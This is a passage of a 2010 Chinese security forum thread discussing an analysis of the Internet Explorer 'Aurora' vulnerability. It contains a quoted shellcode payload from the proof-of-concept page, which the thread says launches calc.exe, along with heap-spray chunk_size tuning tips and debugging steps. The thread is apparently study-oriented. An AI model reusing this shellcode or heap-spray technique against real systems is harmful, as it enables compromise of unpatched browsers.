首页
社区
课程
招聘
[原创+整理]IE极光漏洞的原理探秘
发表于: 2010-1-25 06:13 38525

[原创+整理]IE极光漏洞的原理探秘

2010-1-25 06:13
38525
收藏
免费 7
支持
分享
最新回复 (70)
雪    币: 267
活跃值: (24)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
26
膜拜,好久没通宵了!
2010-1-25 17:29
0
雪    币: 388
活跃值: (25)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
27
成功运行 学习学习 ~
2010-1-25 20:22
0
雪    币: 10885
活跃值: (3288)
能力值: (RANK:520 )
在线值:
发帖
回帖
粉丝
28
感谢分享,漏洞细节真复杂。

我是XP SP2 ,IE6.0
chunk_size 改大点是不是会好点,0X80000 没弹出计算器,chunk_size = 0x90000;  时弹出计算器。
2010-1-25 23:52
0
雪    币: 8
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
29
官方现在已经给出相应的补丁了。
2010-1-26 00:45
0
雪    币: 242
活跃值: (1664)
能力值: ( LV9,RANK:410 )
在线值:
发帖
回帖
粉丝
30
不错,学习一下
2010-1-26 08:47
0
雪    币: 1312
活跃值: (5164)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
31
[QUOTE=轩辕小聪;751279]附件为PoC网页,如果进入shellcode成功会弹出个计算器,貌似这个网上已经有了。 aurora.rar[/QUOTE]

太深了, 我连什么地方是"计算器"的字符串也看不出.....
unescape 好像解密不了: http://blog.gxceo.com/gj/base64.html

请问在这里吗?

payload = unescape("%uc931%ue983%ud9dd%ud9ee%u2474%u5bf4%u7381%u6f13%ub102%u830e%ufceb%uf4e2%uea93%u0ef5%u026f%u4b3a%u8953%u0bcd%u0317%u855e%u1a20%u513a%u034f%u475a%u36e4%u0f3a%u3381%u9771%u86c3%u7a71%uc368%u037b%uc06e%ufa5a%u5654%u0a95%ue71a%u513a%u034b%u685a%u0ee4%u85fa%u1e30%ue5b0%u1ee4%u0f3a%u8b84%u2aed%uc16b%uce80%u890b%u3ef1%uc2ea%u02c9%u42e4%u85bd%u1e1f%u851c%u0a07%u075a%u82e4%u0e01%u026f%u663a%u5d53%uf880%u540f%uf638%uc2ec%u5eca%u7c07%uec69%u6a1c%uf029%u0ce5%uf1e6%u6188%u62d0%u2c0c%u76d4%u020a%u0eb1");
2010-1-26 11:00
0
雪    币: 206
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
32
牛人!~我用ollydbg调了好几天,都搞不定ie7的shellcode跳转定位问题。看来还需要学习很多东西。windbg有什么学习资料?
2010-1-26 11:07
0
雪    币: 10885
活跃值: (3288)
能力值: (RANK:520 )
在线值:
发帖
回帖
粉丝
33
payload 对应的16进制 就是

31 c9 83 e9 ............
每两个一组反序就是了

16进制对应的 汇编代码是 调用 cals.exe的 shellcode
其中cals.exe字符串在shellcode里是加密了的 执行shellcode 是有个解码的过程的 所以看不到字符串在什么地方

“我用ollydbg调了好几天,都搞不定ie7的shellcode跳转定位问题”...


od载入iexplorer.exe 运行 弹出ie后选择打开poc  然后od会在异常的地方停下来,
od里环境有所改变 这时ecx 的值 没有被0a0a0a0a覆盖,你可以手动给ecx赋值 0a0a0a0a
单步进入call里执行,经过漫长的指令0a0a 0a0a 后就到shellcode 了。

heap spray 似乎不需要精确的shellcode定位 只需要申足够大的内存地址空间 把需要覆盖掉的指针地址覆盖掉 就ok了,属于暴力型的。所以这个chunk_size  你也可以自己试着随意给。
2010-1-26 11:28
0
雪    币: 272
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
34
想问楼主下:
mshtml!CEventObj::GenericGetElement+0x99
mshtml!CEventObj::get_srcElement+0x15
这里的函数名是如何显示出来的?
我加载了符号表,但是没有显示的和你大不一样
2010-1-26 13:50
0
雪    币: 206
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
35
在ollydbg里面怎么找到这块有问题的代码?
2010-1-26 16:16
0
雪    币: 414
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
36
拜膜小聪~拜膜漏洞~
2010-1-29 20:18
0
雪    币: 707
活跃值: (1301)
能力值: ( LV9,RANK:190 )
在线值:
发帖
回帖
粉丝
37
牛B,学习了
2010-1-29 23:51
0
雪    币: 492
活跃值: (53)
能力值: ( LV6,RANK:80 )
在线值:
发帖
回帖
粉丝
38
多谢,仔细研究中
2010-1-30 14:09
0
雪    币: 230
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
39
恩,实在是佩服的五体投地。。。发现这个漏洞的人是个天才
2010-1-30 14:14
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
40
不懂,但要坚持学
2010-1-30 19:21
0
雪    币: 240
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
41
在此向小聪学习了。
2010-1-30 21:42
0
雪    币: 102
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
42
大虾的分析实在精辟,应该是安全公司的人
2010-1-30 21:48
0
雪    币: 246
活跃值: (17)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
43
哇。。来学习一下。
2010-1-31 01:21
0
雪    币: 210
活跃值: (20)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
44
纯支持了,看不懂的
2010-1-31 01:41
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
45
好恐怖哦
一不小心 就中招了......
2010-1-31 02:05
0
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
46
学习中 顶了  谢谢lz
2010-1-31 23:22
0
雪    币: 455
活跃值: (17)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
47
“不是起来得太早,是通宵了”,难道这就是99%的汗水,呵……小聪手艺愈发精湛了。
2010-2-1 02:31
0
雪    币: 635
活跃值: (101)
能力值: ( LV12,RANK:420 )
在线值:
发帖
回帖
粉丝
48
楼主玩得也太晚了。上个月月中就玩过了,只花了半个小时
2010-2-1 14:17
0
雪    币: 242
活跃值: (1664)
能力值: ( LV9,RANK:410 )
在线值:
发帖
回帖
粉丝
49
学习中,很强大
2010-2-2 15:17
0
雪    币: 390
活跃值: (15)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
50
顶楼主,分析的太棒了~~~
2010-2-2 19:24
0
游客
登录 | 注册 方可回帖
返回
//